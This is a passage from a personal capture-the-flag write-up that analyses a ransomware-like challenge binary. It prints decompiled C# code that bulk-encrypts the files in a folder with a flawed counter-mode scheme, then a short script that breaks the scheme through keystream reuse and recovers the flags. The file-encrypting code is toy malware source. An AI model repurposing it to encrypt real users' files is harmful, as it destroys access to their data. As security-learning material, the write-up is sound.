		byte[] array = Generate128BitsOfRandomEntropy();
		byte[] bytes = Encoding.UTF8.GetBytes("n0nc3FTW");
		ulong num = 0uL;
		foreach (FileInfo item in list)
		{
			Encrypt(item.FullName, array, bytes, num);
		}
		GenerateFlag(bytes);
	}

	private static string GenerateFlag(byte[] P_0)
	{
		Array.Reverse(P_0);
		byte b = 66;
		for (int i = 0; i < P_0.Length; i++)
		{
			P_0[i] ^= b;
		}
		using MD5 mD = MD5.Create();
		string text = BitConverter.ToString(mD.ComputeHash(P_0)).Replace("-", "").ToLower();
		return "flag{" + text + "}";
	}

If we take all of the decompiled code, make some modifications, and dotnet run it, we get our next flag! flag{9335fd733e24164c98b741e49ec064c3}

Part 3

Crypto... ??

My mortal enemy! Crypto! The zip file contains a bunch of encrypted files. There's a big hint in the description, though. The CTF logo is the plaintext of one of the encrypted files. Take my word for it that, after downloading nahamcon.png and comparing the size to the encrypted file nahamcon.EXTEN, the sizes are identical! This is also an indirect hint that there's no padding going on during the encryption, incidentally.

Said logo

Here's some of the Main code again, including the stuff I didn't paste earlier. 

	private static void Encrypt(string P_0, byte[] P_1, byte[] P_2, ulong P_3)
	{
		try
		{
			string path = Path.GetDirectoryName(P_0) + "\\" + Path.GetFileName(P_0).Replace(Path.GetExtension(P_0), ".EXTEN");
			ICryptoTransform cryptoTransform = new AesCounterMode(P_2, P_3).CreateEncryptor(P_1, null);
			byte[] array = new byte[0];
			using (Stream stream = File.OpenRead(P_0))
			{
				using MemoryStream memoryStream = new MemoryStream();
				stream.CopyTo(memoryStream);
				array = memoryStream.ToArray();
			}
			byte[] array2 = new byte[array.Length];
			cryptoTransform.TransformBlock(array, 0, array.Length, array2, 0);
			File.WriteAllBytes(path, array2);
		}
		catch (Exception)
		{
		}
	}

	private static void Main()
	{
		List<FileInfo> list = new List<FileInfo>();
		FileEnumeration("C:\\Users\\lenovo\\Desktop\\FilesToEncrypt", list);
		byte[] array = Generate128BitsOfRandomEntropy();
		byte[] bytes = Encoding.UTF8.GetBytes("n0nc3FTW");
		ulong num = 0uL;
		foreach (FileInfo item in list)
		{
			Encrypt(item.FullName, array, bytes, num);
		}
		GenerateFlag(bytes);
	}

	private static byte[] Generate128BitsOfRandomEntropy()
	{
		byte[] array = new byte[16];
		RandomNumberGenerator.Create().GetBytes(array);
		return array;
	}

The code appears to generate 16 random bytes, which could become a problem. The big detail here is that the code instantiates a new AesCounterMode for each file that gets encrypted. It's a decent hint that, whatever we can figure out for our plaintext/ciphertext pair, we can use across the rest of the files.

Here's a slightly trimmed down version of AesCounterMode, which is also a part of the application. 

public class AesCounterMode : SymmetricAlgorithm
{
	private readonly ulong _nonce;
	private readonly ulong _counter;
	private readonly AesManaged _aes;

	public AesCounterMode(byte[] P_0, ulong P_1)
		: this(ConvertNonce(P_0), P_1)
	{
	}

	public AesCounterMode(ulong P_0, ulong P_1)
	{
		_aes = new AesManaged
		{
			Mode = CipherMode.ECB,
			Padding = PaddingMode.None
		};
		_nonce = P_0;
		_counter = P_1;
	}

	private static ulong ConvertNonce(byte[] P_0) => ..;

	public override ICryptoTransform CreateEncryptor(byte[] P_0, byte[] P_1)
	{
		return new CounterModeCryptoTransform(_aes, P_0, _nonce, _counter);
	}
}

Even though the name of the application includes AES_CTR, we're using ECB ??. Otherwise, not much to go on here, except that there's this CounterModeCryptoTransform -- also a part of the application. Let's take a gander. Unfortunately, it's a bit long. 

public class CounterModeCryptoTransform : ICryptoTransform, IDisposable
{
	private readonly byte[] _nonceAndCounter;
	private readonly ICryptoTransform _counterEncryptor;
	private readonly Queue<byte> _xorMask = new Queue<byte>();
	private readonly SymmetricAlgorithm _symmetricAlgorithm;
	private ulong _counter;
	private byte[] _counterModeBlock;

	public CounterModeCryptoTransform(SymmetricAlgorithm P_0, byte[] P_1, ulong P_2, ulong P_3)
	{
		if (P_1 == null)
		{
			throw new ArgumentNullException("key");
		}
		_symmetricAlgorithm = P_0 ?? throw new ArgumentNullException("symmetricAlgorithm");
		_counter = P_3;
		_nonceAndCounter = new byte[16];
		BitConverter.TryWriteBytes(_nonceAndCounter, P_2);
		BitConverter.TryWriteBytes(new Span<byte>(_nonceAndCounter, 8, 8), P_3);
		byte[] rgbIV = new byte[_symmetricAlgorithm.BlockSize / 8];
		_counterEncryptor = P_0.CreateEncryptor(P_1, rgbIV);
	}

	public int TransformBlock(byte[] P_0, int P_1, int P_2, byte[] P_3, int P_4)
	{
		for (int i = 0; i < P_2; i++)
		{
			if (NeedMoreXorMaskBytes())
			{
				EncryptCounterThenIncrement();
			}
			byte b = _xorMask.Dequeue();
			P_3[P_4 + i] = (byte)(P_0[P_1 + i] ^ b);
		}
		return P_2;
	}

	private bool NeedMoreXorMaskBytes()
	{
		return _xorMask.Count == 0;
	}

	private void EncryptCounterThenIncrement()
	{
		if (_counterModeBlock == null)
		{
			_counterModeBlock = new byte[_symmetricAlgorithm.BlockSize / 8];
		}
		_counterEncryptor.TransformBlock(_nonceAndCounter, 0, _nonceAndCounter.Length, _counterModeBlock, 0);
		IncrementCounter();
		byte[] counterModeBlock = _counterModeBlock;
		foreach (byte item in counterModeBlock)
		{
			_xorMask.Enqueue(item);
		}
	}

	private void IncrementCounter()
	{
		_counter++;
		BitConverter.TryWriteBytes(new Span<byte>(_nonceAndCounter, 8, 8), _counter);
	}
}

Since ILSpy didn't really give good parameter names, and I'm too lazy to translate it myself, here's are some notes (and red-herrings):

  • The "AES-CTR counter" is effectively initialized to the "constant nonce" (n0nc3FTW).
  • The AES-ECB thingy we passed in is used for producing bytes for the counter.
  • Each byte produced by the AES-ECB operation is XOR'd with the plaintext.

My first thought was that we can XOR the plaintext and ciphertext to get the set of AES-ECB encrypted bytes. I was then hoping that, since this is the result of encrypting a known value (the counter) multiple times, the random key could somehow be derived. Aside from brute-forcing, which isn't really feasible, research suggests this is impossible and that usual attacks on ECB require chosen-plaintexts (we only have known).

I mentioned earlier the same encryption process is performed anew for each file. I didn't realize this initially, hence why I went down the wrong path. Put another way, the set of bytes that gets XOR'd with the plaintext is the same for each and every plaintext. What we effectively have is a one-time-pad. And a bit of more good news: our known plaintext and ciphertext are the largest files of the bunch! We can take our XOR'd logo plaintext and ciphertext and use that to decrypt every file. Here's the code in C# to do it: 

using System.Security.Cryptography;

byte[] origImg = File.ReadAllBytes(@"J:\Randodev\ctrwut\nahamcon.png");
byte[] encImg = File.ReadAllBytes(@"J:\Randodev\ctrwut\encfiles\nahamcon.EXTEN");
byte[] oneTimePad = origImg.ToArray();
for (int i = 0; i < oneTimePad.Length; i++)
{
    oneTimePad[i] ^= encImg[i];
}

//Directory.Delete(@"J:\Randodev\ctrwut\encfiles\results", recursive: true);
Directory.CreateDirectory(@"J:\Randodev\ctrwut\encfiles\results");

foreach (string encFilePath in Directory.GetFiles(@"J:\Randodev\ctrwut\encfiles\"))
{
    byte[] origData = File.ReadAllBytes(encFilePath);
    for (int i = 0; i < origData.Length; i++)
    {
        origData[i] ^= oneTimePad[i];
    }
    
    File.WriteAllBytes($@"J:\Randodev\ctrwut\encfiles\results\{Path.GetFileNameWithoutExtension(encFilePath)}.unenc", origData);
}

Using the file command, most files were plaintext and image files. The text files had nothing flaggy. I used the oldie but goodie IrfanView to view the images files that were a mix of formats; we don't have the original extensions, and IrfanView doesn't care. One image is this absolutely adorable flag carrier!

flag{fd2a43e7095c16685e86567f20f2eca5}

And there's our third and final flag!??

要查看或添加评论,请登录

Tim M.的更多文章

  • HackIM Goa CTF 2025 - Sess.io
    2025年2月6日

    HackIM Goa CTF 2025 - Sess.io

    Also available on my website Challenge Here's what the challenge looks like: Long, you say? Imagine the entropy!! And…

  • HackIM Goa CTF 2025 - ZONEy
    2025年2月6日

    HackIM Goa CTF 2025 - ZONEy

    Also available on my website Challenge Here's what the challenge looks like: A quick connect via netcat shows no…

  • HackIM Goa CTF 2025 - Powerplay
    2025年2月6日

    HackIM Goa CTF 2025 - Powerplay

    Also available on my website Challenge Here's what the challenge looks like: I could use some inspiration right about…

  • UofTCTF 2025 - CodeDB
    2025年1月13日

    UofTCTF 2025 - CodeDB

    This was the challenge I was most happiest to complete because, spoiler alert: it was my first change to perform a…

  • UofTCTF 2025 - Out of the Container
    2025年1月13日

    UofTCTF 2025 - Out of the Container

    It's been a little bit since I've done a CTF, let alone a write-up! I've been focusing on the job search and haven't…

  • The power of C# local functions!
    2024年6月12日

    The power of C# local functions!

    I'm in-between CTFs and a bit bored, so why not a programming-related article! Local functions Introduction Local…

  • NahamCon CTF 2024 - LogJam (sorta)
    2024年5月31日

    NahamCon CTF 2024 - LogJam (sorta)

    This challenge I didn't have time to even start, but, since forensics is fun, I wanted to give it a try even after the…

  • NahamCon CTF 2024 - Taking Up Residence
    2024年5月26日

    NahamCon CTF 2024 - Taking Up Residence

    Another fun one! This was the final challenge I completed before heading to bed..

    1 条评论
  • NahamCon CTF 2024 - Curly Fries
    2024年5月25日

    NahamCon CTF 2024 - Curly Fries

    美味しそう~ While this challenge was probably child's play for those more experienced, I found it rather amusing and fun…

  • NahamCon CTF 2024 - Thomas DEVerson
    2024年5月25日

    NahamCon CTF 2024 - Thomas DEVerson

    More CTFs, more opportunities to create write-ups that will hopefully connect me with a job! Here's the challenge:…

社区洞察

其他会员也浏览了